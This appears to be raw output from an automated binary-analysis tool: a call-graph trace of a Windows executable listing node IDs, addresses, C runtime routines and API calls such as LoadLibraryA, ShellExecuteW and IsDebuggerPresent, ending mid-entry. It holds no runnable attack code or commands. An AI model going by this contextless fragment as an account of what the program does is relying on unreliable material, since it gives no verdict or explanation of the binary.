_doexit 93549->93647 93552 405f0e _raise 93554 407f01 93553->93554 93554->93520 93555->93521 93648 40123a 30 API calls 2 library calls 93556->93648 93558 407b4c 93649 407e23 InitializeCriticalSectionAndSpinCount 93558->93649 93560 407b51 93561 407b55 93560->93561 93651 407e6d TlsAlloc 93560->93651 93650 407bbd 50 API calls 2 library calls 93561->93650 93564 407b67 93564->93561 93566 407b72 93564->93566 93565 407b5a 93565->93525 93652 406986 93566->93652 93569 407bb4 93660 407bbd 50 API calls 2 library calls 93569->93660 93572 407b93 93572->93569 93574 407b99 93572->93574 93573 407bb9 93573->93525 93659 407a94 47 API calls 4 library calls 93574->93659 93576 407ba1 GetCurrentThreadId 93576->93525 93578 40acbf _raise 93577->93578 93669 407cf4 93578->93669 93580 40acc6 93581 406986 __calloc_crt 47 API calls 93580->93581 93582 40acd7 93581->93582 93583 40ad42 GetStartupInfoW 93582->93583 93584 40ace2 _raise @_EH4_CallFilterFunc@8 93582->93584 93591 40ae80 93583->93591 93593 40ad57 93583->93593 93584->93529 93585 40af44 93676 40af58 LeaveCriticalSection _doexit 93585->93676 93587 40aec9 GetStdHandle 93587->93591 93588 406986 __calloc_crt 47 API calls 93588->93593 93589 40aedb GetFileType 93589->93591 93590 40ada5 93590->93591 93594 40ade5 InitializeCriticalSectionAndSpinCount 93590->93594 93595 40add7 GetFileType 93590->93595 93591->93585 93591->93587 93591->93589 93592 40af08 InitializeCriticalSectionAndSpinCount 93591->93592 93592->93591 93593->93588 93593->93590 93593->93591 93594->93590 93595->93590 93595->93594 93597 405ead 93596->93597 93598 412e8e 93596->93598 93603 412a7b GetModuleFileNameW 93597->93603 93708 4069d0 47 API calls std::exception::_Copy_str 93598->93708 93601 412eb4 ___crtGetEnvironmentStringsW 93602 412eca FreeEnvironmentStringsW 93601->93602 93602->93597 93604 412aaf _wparse_cmdline 93603->93604 93605 405eb7 93604->93605 93606 412ae9 93604->93606 93605->93537 93643 40115b 47 API calls 3 library calls 93605->93643 93709 4069d0 47 API calls std::exception::_Copy_str 93606->93709 93608 412aef _wparse_cmdline 93608->93605 93610 412ccd __NMSG_WRITE 93609->93610 93614 412cc5 93609->93614 93611 406986 __calloc_crt 47 API calls 93610->93611 93619 412cf6 __NMSG_WRITE 93611->93619 93612 412d4d 93613 401c9d _free 47 API calls 93612->93613 93613->93614 93614->93540 93615 406986 __calloc_crt 47 API calls 93615->93619 93616 412d72 93617 401c9d _free 47 API calls 93616->93617 93617->93614 93619->93612 93619->93614 93619->93615 93619->93616 93620 412d89 93619->93620 93710 412567 47 API calls __cftog_l 93619->93710 93711 406e20 IsProcessorFeaturePresent 93620->93711 93622 412d95 93622->93540 93624 4011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 93623->93624 93626 4011e0 __IsNonwritableInCurrentImage 93624->93626 93734 400f0a 52 API calls __cinit 93624->93734 93626->93544 93628 3e3a29 93627->93628 93629 451ebf 93627->93629 93630 3e3a63 IsThemeActive 93628->93630 93735 401405 93630->93735 93634 3e3a8f 93747 3e3adb SystemParametersInfoW SystemParametersInfoW 93634->93747 93636 3e3a9b 93748 3e3d19 93636->93748 93638 3e3aa3 SystemParametersInfoW 93639 3e3ac8 93638->93639 93639->93548 93640->93522 93641->93526 93642->93533 93646->93549 93647->93552 93648->93558 93649->93560 93650->93565 93651->93564 93654 40698d 93652->93654 93655 4069ca 93654->93655 93656 4069ab Sleep 93654->93656 93661 4130aa 93654->93661 93655->93569 93658 407ec9 TlsSetValue 93655->93658 93657 4069c2 93656->93657 93657->93654 93657->93655 93658->93572 93659->93576 93660->93573 93662 4130d0 __calloc_impl 93661->93662 93663 4130b5 93661->93663 93666 4130e0 HeapAlloc 93662->93666 93667 4130c6 93662->93667 93663->93662 93664 4130c1 93663->93664 93668 407c0e 47 API calls __getptd_noexit 93664->93668 93666->93662 93666->93667 93667->93654 93668->93667 93670 407d05 93669->93670 93671 407d18 EnterCriticalSection 93669->93671 93677 407d7c 93670->93677 93671->93580 93673 407d0b 93673->93671 93701 40115b 47 API calls 3 library calls 93673->93701 93676->93584 93678 407d88 _raise 93677->93678 93679 407d91 93678->93679 93680 407da9 93678->93680 93702 4081c2 47 API calls __NMSG_WRITE 93679->93702 93681 407da7 93680->93681 93688 407e11 _raise 93680->93688 93681->93680 93705 4069d0 47 API calls std::exception::_Copy_str 93681->93705 93684 407d96 93703 40821f 47 API calls 5 library calls 93684->93703 93686 407dbd 93689 407dd3 93686->93689 93690 407dc4 93686->93690 93687 407d9d 93704 401145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93687->93704 93688->93673 93693 407cf4 __lock 46 API calls 93689->93693 93706 407c0e 47 API calls __getptd_noexit 93690->93706 93695 407dda 93693->93695 93694 407dc9 93694->93688 93696 407de9 InitializeCriticalSectionAndSpinCount 93695->93696 93697 407dfe 93695->93697 93699 407e04 93696->93699 93698 401c9d _free 46 API calls 93697->93698 93698->93699 93707 407e1a LeaveCriticalSection _doexit 93699->93707 93702->93684 93703->93687 93705->93686 93706->93694 93707->93688 93708->93601 93709->93608 93710->93619 93712 406e2b 93711->93712 93717 406cb5 93712->93717 93716 406e46 93716->93622 93718 406ccf _memset ___raise_securityfailure 93717->93718 93719 406cef IsDebuggerPresent 93718->93719 93725 4081ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93719->93725 93722 406db3 ___raise_securityfailure 93726 40a70c 93722->93726 93723 406dd6 93724 408197 GetCurrentProcess TerminateProcess 93723->93724 93724->93716 93725->93722 93727 40a714 93726->93727 93728 40a716 IsProcessorFeaturePresent 93726->93728 93727->93723 93730 4137b0 93728->93730 93733 41375f 5 API calls 2 library calls 93730->93733 93732 413893 93732->93723 93733->93732 93734->93626 93736 407cf4 __lock 47 API calls 93735->93736 93737 401410 93736->93737 93800 407e58 LeaveCriticalSection 93737->93800 93739 3e3a88 93740 40146d 93739->93740 93741 401491 93740->93741 93742 401477 93740->93742 93741->93634 93742->93741 93801 407c0e 47 API calls __getptd_noexit 93742->93801 93744 401481 93802 406e10 8 API calls __cftog_l 93744->93802 93746 40148c 93746->93634 93747->93636 93749 3e3d26 __ftell_nolock 93748->93749 93750 3ed7f7 48 API calls 93749->93750 93751 3e3d31 GetCurrentDirectoryW 93750->93751 93803 3e61ca 93751->93803 93753 3e3d57 IsDebuggerPresent 93754 451cc1 MessageBoxA 93753->93754 93755 3e3d65 93753->93755 93758 451cd9 93754->93758 93756 3e3e3a 93755->93756 93755->93758 93759 3e3d82 93755->93759 93757 3e3e41 SetCurrentDirectoryW 93756->93757 93762 3e3e4e Mailbox 93757->93762 93980 3fc682 48 API calls 93758->93980 93877 3e40e5 93759->93877 93762->93638 93764 3e3da0 GetFullPathNameW 93766 3e6a63 48 API calls 93764->93766 93765 451ce9 93768 451cff SetCurrentDirectoryW 93765->93768 93767 3e3ddb 93766->93767 93893 3e6430 93767->93893 93768->93762 93771 3e3df6 93772 3e3e00 93771->93772 93981 4271fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93771->93981 93909 3e3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93772->93909 93776 451d1c 93776->93772 93778 451d2d 93776->93778 93780 3e5374 50 API calls 93778->93780 93779 3e3e0a 93781 3e3e1f 93779->93781 93978 3e4ffc 67 API calls _memset 93779->93978 93782 451d35 93780->93782 93917 3ee8d0 93781->93917 93785 3ece19 48 API calls 93782->93785 93787 451d42 93785->93787 93788 451d6e 93787->93788 93789 451d49 93787->93789 93792 3e518c 48 API calls 93788->93792 93791 3e518c 48 API calls 93789->93791 93793 451d54 93791->93793 93794 451d6a GetForegroundWindow ShellExecuteW 93792->93794 93796 3e510d 48 API calls 93793->93796 93797 451d9e Mailbox 93794->93797 93798 451d61 93796->93798 93797->93756 93799 3e518c 48 API calls 93798->93799 93799->93794 93800->93739 93801->93744 93802->93746 93982 3fe99b 93803->93982 93807 3e61eb 93808 3e5374 50 API calls 93807->93808 93809 3e61ff 93808->93809 93810 3ece19 48 API calls 93809->93810 93811 3e620c 93810->93811 93999 3e39db 93811->93999 93813 3e6216 Mailbox 93814 3e6eed 48 API calls 93813->93814 93815 3e622b 93814->93815 94011 3e9048 93815->94011 93818 3ece19 48 API calls 93819 3e6244 93818->93819 94014 3ed6e9 93819->94014 93821 3e6254 Mailbox 93822 3ece19 48 API calls 93821->93822 93823 3e627c 93822->93823 93824 3ed6e9 55 API calls 93823->93824 93825 3e628f Mailbox 93824->93825 93826 3ece19 48 API calls 93825->93826 93827 3e62a0 93826->93827 94018 3ed645 93827->94018 93829 3e62b2 Mailbox 93830 3ed7f7 48 API calls 93829->93830 93831 3e62c5 93830->93831 94028 3e63fc 93831->94028 93835 3e62df 93836 3e62e9 93835->93836 93837 451c08 93835->93837 93838 400fa7 _W_store_winword 59 API calls 93836->93838 93839 3e63fc 48 API calls 93837->93839 93840 3e62f4 93838->93840 93841 451c1c 93839->93841 93840->93841 93842 3e62fe 93840->93842 93843 3e63fc 48 API calls 93841->93843 93844 400fa7 _W_store_winword 59 API calls 93842->93844 93845 451c38 93843->93845 93846 3e6309 93844->93846 93848 3e5374 50 API calls 93845->93848 93846->93845 93847 3e6313 93846->93847 93849 400fa7 _W_store_winword 59 API calls 93847->93849 93850 451c5d 93848->93850 93851 3e631e 93849->93851 93852 3e63fc 48 API calls 93850->93852 93853 3e635f 93851->93853 93855 451c86 93851->93855 93859 3e63fc 48 API calls 93851->93859 93856 451c69 93852->93856 93854 3e636c 93853->93854 93853->93855 94044 3fc050 93854->94044 93857 3e6eed 48 API calls 93855->93857 93858 3e6eed 48 API calls 93856->93858 93860 451ca8 93857->93860 93862 451c77 93858->93862 93863 3e6342 93859->93863 93865 3e63fc 48 API calls 93860->93865 93867 3e63fc 48 API calls 93862->93867 93864 3e6eed 48 API calls 93863->93864 93868 3e6350 93864->93868 93869 451cb5 93865->93869 93866 3e6384 94055 3f1b90 93866->94055 93867->93855 93871 3e63fc 48 API calls 93868->93871 93869->93869 93871->93853 93872 3f1b90 48 API calls 93874 3e6394 93872->93874 93874->93872 93875 3e63fc 48 API calls 93874->93875 93876 3e63d6 Mailbox 93874->93876 94071 3e6b68 48 API calls 93874->94071 93875->93874 93876->93753 93878 3e40f2 __ftell_nolock 93877->93878 93879 3e410b 93878->93879 93880 45370e _memset 93878->93880 93881 3e660f 49 API calls 93879->93881 93883 45372a GetOpenFileNameW 93880->93883 93882 3e4114 93881->93882 94588 3e40a7 93882->94588 93885 453779 93883->93885 93887 3e6a63 48 API calls 93885->93887 93889 45378e 93887->93889 93889->93889 93890 3e4129 94606 3e4139 93890->94606 93894 3e643d __ftell_nolock 93893->93894 94816 3e4c75 93894->94816 93896 3e6442 93897 3e3dee 93896->93897 94827 3e5928 86 API calls 93896->94827 93897->93765 93897->93771 93899 3e644f 93899->93897 94828 3e5798 88 API calls Mailbox 93899->94828 93901 3e6458 93901->93897 93902 3e645c GetFullPathNameW 93901->93902 93903 3e6a63 48 API calls 93902->93903 93904 3e6488 93903->93904 93905 3e6a63 48 API calls 93904->93905 93906 3e6495 93905->93906 93907 455dcf _wcscat 93906->93907 93908 3e6a63 48 API calls 93906->93908 93908->93897 93910 3e3ed8 93909->93910 93911 451cba 93909->93911 94831 3e4024 93910->94831 93915 3e3e05 93916 3e36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93915->93916 93916->93779 93918 3ee8f6 93917->93918 93977 3ee906 Mailbox 93917->93977 93919 3eed52 93918->93919 93918->93977 94924 3fe3cd 346 API calls 93919->94924 93921 3e3e2a 93921->93756 93979 3e3847 Shell_NotifyIconW _memset 93921->93979 93923 3eed63 93923->93921 93924 3eed70 93923->93924 94926 3fe312 346 API calls Mailbox 93924->94926 93925 3ee94c PeekMessageW 93925->93977 93927 45526e Sleep 93927->93977 93928 3eed77 LockWindowUpdate DestroyWindow GetMessageW 93928->93921 93930 3eeda9 93928->93930 93933 4559ef TranslateMessage DispatchMessageW GetMessageW 93930->93933 93931 3eebc7 93931->93921 94925 3e2ff6 16 API calls 93931->94925 93933->93933 93934 455a1f 93933->93934 93934->93921 93935 3eed21 PeekMessageW 93935->93977 93936 3eebf7 timeGetTime 93936->93977 93937 3ff4ea 48 API calls 93937->93977 93939 3e6eed 48 API calls 93939->93977 93940 455557 WaitForSingleObject 93945 455574 GetExitCodeProcess CloseHandle 93940->93945 93940->93977 93941 3eed3a TranslateMessage DispatchMessageW 93941->93935 93942 45588f Sleep 93972 455429 Mailbox 93942->93972 93943 3ed7f7 48 API calls 93943->93972 93944 3e2aae 322 API calls 93944->93977 93945->93977 93946 3eedae timeGetTime 94927 3e1caa 49 API calls 93946->94927 93947 455733 Sleep 93947->93972 93949 3fdc38 timeGetTime 93949->93972 93953 455926 GetExitCodeProcess 93955 455952 CloseHandle 93953->93955 93956 45593c WaitForSingleObject 93953->93956 93954 455445 Sleep 93954->93977 93955->93972 93956->93955 93956->93977 93957 455432 Sleep 93957->93954 93958 448c4b 108 API calls 93958->93972 93959 3e2c79 107 API calls 93959->93972 93961 4559ae Sleep 93961->93977 93962 3e1caa 49 API calls 93962->93977 93965 3ece19 48 API calls 93965->93972 93968 3ed6e9 55 API calls 93968->93972 93972->93943 93972->93949 93972->93953 93972->93954 93972->93957 93972->93958 93972->93959 93972->93961 93972->93965 93972->93968 93972->93977 94929 424cbe 49 API calls Mailbox 93972->94929 94930 3e1caa 49 API calls 93972->94930 94931 3e2aae 346 API calls 93972->94931 94933 43ccb2 50 API calls 93972->94933 94934 427a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93972->94934 94935 426532 63 API calls 3 library calls 93972->94935 93974 3ed6e9 55 API calls 93974->93977 93975 42cc5c 86 API calls 93975->93977 93976 3ece19 48 API calls 93976->93977 93977->93925 93977->93927 93977->93931 93977->93935 93977->93936 93977->93937 93977->93939 93977->93940 93977->93941 93977->93942 93977->93944 93977->93946 93977->93947 93977->93954 93977->93962 93977->93972 93977->93974 93977->93975 93977->93976 94836 3ef110 93977->94836 94901 3f45e0 93977->94901 94919 3eeed0 346 API calls Mailbox 93977->94919 94920 3eef00 86 API calls 93977->94920 94921 3f3200 346 API calls 2 library calls 93977->94921 94922 3fe244 TranslateAcceleratorW 93977->94922 94923 3fdc5f IsDialogMessageW GetClassLongW 93977->94923 94928 448d23 48 API calls 93977->94928 94932 3efe30 346 API calls __cinit 93977->94932 93978->93781 93979->93756 93980->93765 93981->93776 93983 3ed7f7 48 API calls 93982->93983 93984 3e61db 93983->93984 93985 3e6009 93984->93985 93986 3e6016 __ftell_nolock 93985->93986 93987 3e6a63 48 API calls 93986->93987 93991 3e617c Mailbox 93986->93991 93989 3e6048 93987->93989 93997 3e607e Mailbox 93989->93997 94072 3e61a6 93989->94072 93990 3e614f 93990->93991 93992 3ece19 48 API calls 93990->93992 93991->93807 93994 3e6170 93992->93994 93993 3ece19 48 API calls 93993->93997 93996 3e64cf 48 API calls 93994->93996 93995 3e61a6 48 API calls 93995->93997 93996->93991 93997->93990 93997->93991 93997->93993 93997->93995 93998 3e64cf 48 API calls 93997->93998 93998->93997 94075 3e41a9 93999->94075 94002 3e3a06 94002->93813 94005 452ff0 94007 401c9d _free 47 API calls 94005->94007 94008 452ffd 94007->94008 94009 3e4252 84 API calls 94008->94009 94010 453006 94009->94010 94010->94010 94012 3ff4ea 48 API calls 94011->94012 94013 3e6237 94012->94013 94013->93818 94015 3ed6f4 94014->94015 94017 3ed71b 94015->94017 94577 3ed764 55 API calls 94015->94577 94017->93821 94019 3ed654 94018->94019 94026 3ed67e 94018->94026 94020 3ed65b 94019->94020 94022 3ed6c2 94019->94022 94021 3ed666 94020->94021 94027 3ed6ab 94020->94027 94578 3ed9a0 53 API calls __cinit 94021->94578 94022->94027 94580 3fdce0 53 API calls 94022->94580 94026->93829 94027->94026 94579 3fdce0 53 API calls 94027->94579 94029 3e641f 94028->94029 94030 3e6406 94028->94030 94031 3e6a63 48 API calls 94029->94031 94032 3e6eed 48 API calls 94030->94032 94033 3e62d1 94031->94033 94032->94033 94034 400fa7 94033->94034 94035 400fb3 94034->94035 94036 401028 94034->94036 94043 400fd8 94035->94043 94581 407c0e 47 API calls __getptd_noexit 94035->94581 94583 40103a 59 API calls 3 library calls 94036->94583 94038 401035 94038->93835 94040 400fbf 94582 406e10 8 API calls __cftog_l 94040->94582 94042 400fca 94042->93835 94043->93835 94045 3fc064 94044->94045 94047 3fc069 Mailbox 94044->94047 94584 3fc1af 48 API calls 94045->94584 94049 3fc077 94047->94049 94585 3fc15c 48 API calls 94047->94585 94050 3ff4ea 48 API calls 94049->94050 94052 3fc152 94049->94052 94051 3fc108 94050->94051 94053 3ff4ea 48 API calls 94051->94053 94052->93866 94054 3fc113 94053->94054 94054->93866 94056 3f1cf6 94055->94056 94059 3f1ba2 94055->94059 94056->93874 94058 3f1c5d 94058->93874 94061 3ff4ea 48 API calls 94059->94061 94069 3f1bae 94059->94069 94060 3f1bb9 94060->94058 94064 3ff4ea 48 API calls 94060->94064 94062 4549c4 94061->94062 94063 3ff4ea 48 API calls 94062->94063 94070 4549cf 94063->94070 94065 3f1c9f 94064->94065 94066 3f1cb2 94065->94066 94586 3e2925 48 API calls 94065->94586 94066->93874 94068 3ff4ea 48 API calls 94068->94070 94069->94060 94587 3fc15c 48 API calls 94069->94587 94070->94068 94070->94069 94071->93874 94073 3ebdfa 48 API calls 94072->94073 94074 3e61b1 94073->94074 94074->93989 94140 3e4214 94075->94140 94080 454f73 94083 3e4252 84 API calls 94080->94083 94081 3e41d4 LoadLibraryExW 94150 3e4291 94081->94150 94085 454f7a 94083->94085 94086 3e4291 3 API calls 94085->94086 94088 454f82 94086->94088 94176 3e44ed 94088->94176 94089 3e41fb 94089->94088 94090 3e4207 94089->94090 94092 3e4252 84 API calls 94090->94092 94094 3e39fe 94092->94094 94094->94002 94099 42c396 94094->94099 94096 454fa9 94182 3e4950 94096->94182 94098 454fb6 94100 3e4517 83 API calls 94099->94100 94101 42c405 94100->94101 94355 42c56d 94 API calls 2 library calls 94101->94355 94103 42c417 94104 3e44ed 64 API calls 94103->94104 94130 42c41b 94103->94130 94105 42c432 94104->94105 94106 3e44ed 64 API calls 94105->94106 94107 42c442 94106->94107 94108 3e44ed 64 API calls 94107->94108 94109 42c45d 94108->94109 94110 3e44ed 64 API calls 94109->94110 94111 42c478 94110->94111 94112 3e4517 83 API calls 94111->94112 94113 42c48f 94112->94113 94114 40395c std::exception::_Copy_str 47 API calls 94113->94114 94115 42c496 94114->94115 94116 40395c std::exception::_Copy_str 47 API calls 94115->94116 94117 42c4a0 94116->94117 94118 3e44ed 64 API calls 94117->94118 94119 42c4b4 94118->94119 94356 42bf5a GetSystemTimeAsFileTime 94119->94356 94121 42c4c7 94122 42c4f1 94121->94122 94123 42c4dc 94121->94123 94125 42c556 94122->94125 94126 42c4f7 94122->94126 94124 401c9d _free 47 API calls 94123->94124 94127 42c4e2 94124->94127 94129 401c9d _free 47 API calls 94125->94129 94357 42b965 118 API calls __fcloseall 94126->94357 94131 401c9d _free 47 API calls 94127->94131 94129->94130 94130->94005 94134 3e4252 94130->94134 94131->94130 94132 42c54e 94133 401c9d _free 47 API calls 94132->94133 94133->94130 94135 3e425c 94134->94135 94137 3e4263 94134->94137 94358 4035e4 94135->94358 94138 3e4272 94137->94138 94139 3e4283 FreeLibrary 94137->94139 94138->94005 94139->94138 94187 3e4339 94140->94187 94143 3e423c 94145 3e41bb 94143->94145 94146 3e4244 FreeLibrary 94143->94146 94147 403499 94145->94147 94146->94145 94195 4034ae 94147->94195 94149 3e41c8 94149->94080 94149->94081 94274 3e42e4 94150->94274 94154 3e41ec 94157 3e4380 94154->94157 94155 3e42c1 FreeLibrary 94155->94154 94156 3e42b8 94156->94154 94156->94155 94158 3ff4ea 48 API calls 94157->94158 94159 3e4395 94158->94159 94160 3e47b7 48 API calls 94159->94160 94161 3e43a1 ___crtGetEnvironmentStringsW 94160->94161 94162 3e4499 94161->94162 94163 3e44d1 94161->94163 94167 3e43dc 94161->94167 94282 3e406b CreateStreamOnHGlobal 94162->94282 94293 42c750 93 API calls 94163->94293 94164 3e4950 57 API calls 94173 3e43e5 94164->94173 94167->94164 94168 3e44ed 64 API calls 94168->94173 94169 3e4479 94169->94089 94171 454ed7 94172 3e4517 83 API calls 94171->94172 94174 454eeb 94172->94174 94173->94168 94173->94169 94173->94171 94288 3e4517 94173->94288 94175 3e44ed 64 API calls 94174->94175 94175->94169 94177 3e44ff 94176->94177 94178 454fc0 94176->94178 94317 40381e 94177->94317 94181 42bf5a GetSystemTimeAsFileTime 94181->94096 94183 3e495f 94182->94183 94184 455002 94182->94184 94337 403e65 94183->94337 94186 3e4967 94186->94098 94191 3e434b 94187->94191 94190 3e4321 LoadLibraryA GetProcAddress 94190->94143 94192 3e422f 94191->94192 94193 3e4354 LoadLibraryA 94191->94193 94192->94143 94192->94190 94193->94192 94194 3e4365 GetProcAddress 94193->94194 94194->94192 94197 4034ba _raise 94195->94197 94196 4034cd 94243 407c0e 47 API calls __getptd_noexit 94196->94243 94197->94196 94200 4034fe 94197->94200 94199 4034d2 94244 406e10 8 API calls __cftog_l 94199->94244 94214 40e4c8 94200->94214 94203 403503 94204 403519 94203->94204 94205 40350c 94203->94205 94207 403543 94204->94207 94208 403523 94204->94208 94245 407c0e 47 API calls __getptd_noexit 94205->94245 94228 40e5e0 94207->94228 94246 407c0e 47 API calls __getptd_noexit 94208->94246 94210 4034dd _raise @_EH4_CallFilterFunc@8 94210->94149 94215 40e4d4 _raise 94214->94215 94216 407cf4 __lock 47 API calls 94215->94216 94217 40e4e2 94216->94217 94218 40e559 94217->94218 94224 407d7c __mtinitlocknum 47 API calls 94217->94224 94226 40e552 94217->94226 94251 404e5b 48 API calls __lock 94217->94251 94252 404ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94217->94252 94253 4069d0 47 API calls std::exception::_Copy_str 94218->94253 94221 40e560 94223 40e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94221->94223 94221->94226 94222 40e5cc _raise 94222->94203 94223->94226 94224->94217 94248 40e5d7 94226->94248 94229 40e600 __wopenfile 94228->94229 94230 40e61a 94229->94230 94242 40e7d5 94229->94242 94260 40185b 59 API calls 2 library calls 94229->94260 94258 407c0e 47 API calls __getptd_noexit 94230->94258 94232 40e61f 94259 406e10 8 API calls __cftog_l 94232->94259 94234 40354e 94247 403570 LeaveCriticalSection LeaveCriticalSection _fseek 94234->94247 94235 40e838 94255 4163c9 94235->94255 94238 40e7ce 94238->94242 94261 40185b 59 API calls 2 library calls 94238->94261 94240 40e7ed 94240->94242 94262 40185b 59 API calls 2 library calls 94240->94262 94242->94230 94242->94235 94243->94199 94244->94210 94245->94210 94246->94210 94247->94210 94254 407e58 LeaveCriticalSection 94248->94254 94250 40e5de 94250->94222 94251->94217 94252->94217 94253->94221 94254->94250 94263 415bb1 94255->94263 94257 4163e2 94257->94234 94258->94232 94259->94234 94260->94238 94261->94240 94262->94242 94264 415bbd _raise 94263->94264 94265 415bcf 94264->94265 94268 415c06 94264->94268 94266 407c0e __cftog_l 47 API calls 94265->94266 94267 415bd4 94266->94267 94269 406e10 __cftog_l 8 API calls 94267->94269 94270 415c78 __wsopen_helper 110 API calls 94268->94270 94273 415bde _raise 94269->94273 94271 415c23 94270->94271 94272 415c4c __wsopen_helper LeaveCriticalSection 94271->94272 94272->94273 94273->94257 94278 3e42f6 94274->94278 94277 3e42cc LoadLibraryA GetProcAddress 94277->94156 94279 3e42aa 94278->94279 94280 3e42ff LoadLibraryA 94278->94280 94279->94156 94279->94277 94280->94279 94281 3e4310 GetProcAddress 94280->94281 94281->94279 94283 3e4085 FindResourceExW 94282->94283 94285 3e40a2 94282->94285 94284 454f16 LoadResource 94283->94284 94283->94285 94284->94285 94286 454f2b SizeofResource 94284->94286 94285->94167 94286->94285 94287 454f3f LockResource 94286->94287 94287->94285 94289 454fe0 94288->94289 94290 3e4526 94288->94290 94294 403a8d 94290->94294 94292 3e4534 94292->94173 94293->94167 94297 403a99 _raise 94294->94297 94295 403aa7 94307 407c0e 47 API calls __getptd_noexit 94295->94307 94297->94295 94298 403acd 94297->94298 94309 404e1c 94298->94309 94299 403aac 94308 406e10 8 API calls __cftog_l 94299->94308 94302 403ad3 94315 4039fe 81 API calls 4 library calls 94302->94315 94304 403ab7 _raise 94304->94292 94305 403ae2 94316 403b04 LeaveCriticalSection LeaveCriticalSection _fseek 94305->94316 94307->94299 94308->94304 94310 404e2c 94309->94310 94311 404e4e EnterCriticalSection 94309->94311 94310->94311 94312 404e34 94310->94312 94313 404e44 94311->94313 94314 407cf4 __lock 47 API calls 94312->94314 94313->94302 94314->94313 94315->94305 94316->94304 94320 403839 94317->94320 94319 3e4510 94319->94181 94321 403845 _raise 94320->94321 94322 403888 94321->94322 94323 40385b _memset 94321->94323 94324 403880 _raise 94321->94324 94325 404e1c __lock_file 48 API calls 94322->94325 94333 407c0e 47 API calls __getptd_noexit 94323->94333 94324->94319 94327 40388e 94325->94327 94335 40365b 62 API calls 5 library calls 94327->94335 94328 403875 94334 406e10 8 API calls __cftog_l 94328->94334 94331 4038a4 94336 4038c2 LeaveCriticalSection LeaveCriticalSection _fseek 94331->94336 94333->94328 94334->94324 94335->94331 94336->94324 94338 403e71 _raise 94337->94338 94339 403e94 94338->94339 94340 403e7f 94338->94340 94342 404e1c __lock_file 48 API calls 94339->94342 94351 407c0e 47 API calls __getptd_noexit 94340->94351 94344 403e9a 94342->94344 94343 403e84 94352 406e10 8 API calls __cftog_l 94343->94352 94353 403b0c 55 API calls 4 library calls 94344->94353 94347 403ea5 94354 403ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94347->94354 94349 403eb7 94350 403e8f _raise 94349->94350 94350->94186 94351->94343 94352->94350 94353->94347 94354->94349 94355->94103 94356->94121 94357->94132 94359 4035f0 _raise 94358->94359 94360 403604 94359->94360 94361 40361c 94359->94361 94387 407c0e 47 API calls __getptd_noexit 94360->94387 94363 404e1c __lock_file 48 API calls 94361->94363 94368 403614 _raise 94361->94368 94365 40362e 94363->94365 94364 403609 94388 406e10 8 API calls __cftog_l 94364->94388 94371 403578 94365->94371 94368->94137 94372 403587 94371->94372 94373 40359b 94371->94373 94430 407c0e 47 API calls __getptd_noexit 94372->94430 94375 403597 94373->94375 94390 402c84 94373->94390 94389 403653 LeaveCriticalSection LeaveCriticalSection _fseek 94375->94389 94376 40358c 94431 406e10 8 API calls __cftog_l 94376->94431 94383 4035b5 94407 40e9d2 94383->94407 94385 4035bb 94385->94375 94386 401c9d _free 47 API calls 94385->94386 94386->94375 94387->94364 94388->94368 94389->94368 94391 402c97 94390->94391 94395 402cbb 94390->94395 94392 402933 __fclose_nolock 47 API calls 94391->94392 94391->94395 94393 402cb4 94392->94393 94432 40af61 94393->94432 94396 40eb36 94395->94396 94397 4035af 94396->94397 94398 40eb43 94396->94398 94400 402933 94397->94400 94398->94397 94399 401c9d _free 47 API calls 94398->94399 94399->94397 94401 402952 94400->94401 94402 40293d 94400->94402 94401->94383 94538 407c0e 47 API calls __getptd_noexit 94402->94538 94404 402942 94539 406e10 8 API calls __cftog_l 94404->94539 94406 40294d 94406->94383 94408 40e9de _raise 94407->94408 94409 40e9e6 94408->94409 94410 40e9fe 94408->94410 94555 407bda 47 API calls __getptd_noexit 94409->94555 94412 40ea7b 94410->94412 94415 40ea28 94410->94415 94559 407bda 47 API calls __getptd_noexit 94412->94559 94413 40e9eb 94556 407c0e 47 API calls __getptd_noexit 94413->94556 94419 40a8ed ___lock_fhandle 49 API calls 94415->94419 94417 40ea80 94560 407c0e 47 API calls __getptd_noexit 94417->94560 94421 40ea2e 94419->94421 94420 40ea88 94561 406e10 8 API calls __cftog_l 94420->94561 94423 40ea41 94421->94423 94424 40ea4c 94421->94424 94540 40ea9c 94423->94540 94557 407c0e 47 API calls __getptd_noexit 94424->94557 94426 40e9f3 _raise 94426->94385 94428 40ea47 94558 40ea73 LeaveCriticalSection __unlock_fhandle 94428->94558 94430->94376 94431->94375 94433 40af6d _raise 94432->94433 94434 40af75 94433->94434 94435 40af8d 94433->94435 94530 407bda 47 API calls __getptd_noexit 94434->94530 94437 40b022 94435->94437 94442 40afbf 94435->94442 94535 407bda 47 API calls __getptd_noexit 94437->94535 94438 40af7a 94531 407c0e 47 API calls __getptd_noexit 94438->94531 94441 40b027 94536 407c0e 47 API calls __getptd_noexit 94441->94536 94457 40a8ed 94442->94457 94443 40af82 _raise 94443->94395 94446 40b02f 94537 406e10 8 API calls __cftog_l 94446->94537 94447 40afc5 94449 40afd8 94447->94449 94450 40afeb 94447->94450 94466 40b043 94449->94466 94532 407c0e 47 API calls __getptd_noexit 94450->94532 94453 40afe4 94534 40b01a LeaveCriticalSection __unlock_fhandle 94453->94534 94454 40aff0 94533 407bda 47 API calls __getptd_noexit 94454->94533 94458 40a8f9 _raise 94457->94458 94459 40a946 EnterCriticalSection 94458->94459 94461 407cf4 __lock 47 API calls 94458->94461 94460 40a96c _raise 94459->94460 94460->94447 94462 40a91d 94461->94462 94463 40a928 InitializeCriticalSectionAndSpinCount 94462->94463 94464 40a93a 94462->94464 94463->94464 94465 40a970 ___lock_fhandle LeaveCriticalSection 94464->94465 94465->94459 94467 40b050 __ftell_nolock 94466->94467 94468 40b0ac 94467->94468 94469 40b08d 94467->94469 94500 40b082 94467->94500 94474 40b105 94468->94474 94475 40b0e9 94468->94475 94471 407bda __set_osfhnd 47 API calls 94469->94471 94470 40a70c __cftog_l 6 API calls 94472 40b86b 94470->94472 94473 40b092 94471->94473 94472->94453 94476 407c0e __cftog_l 47 API calls 94473->94476 94477 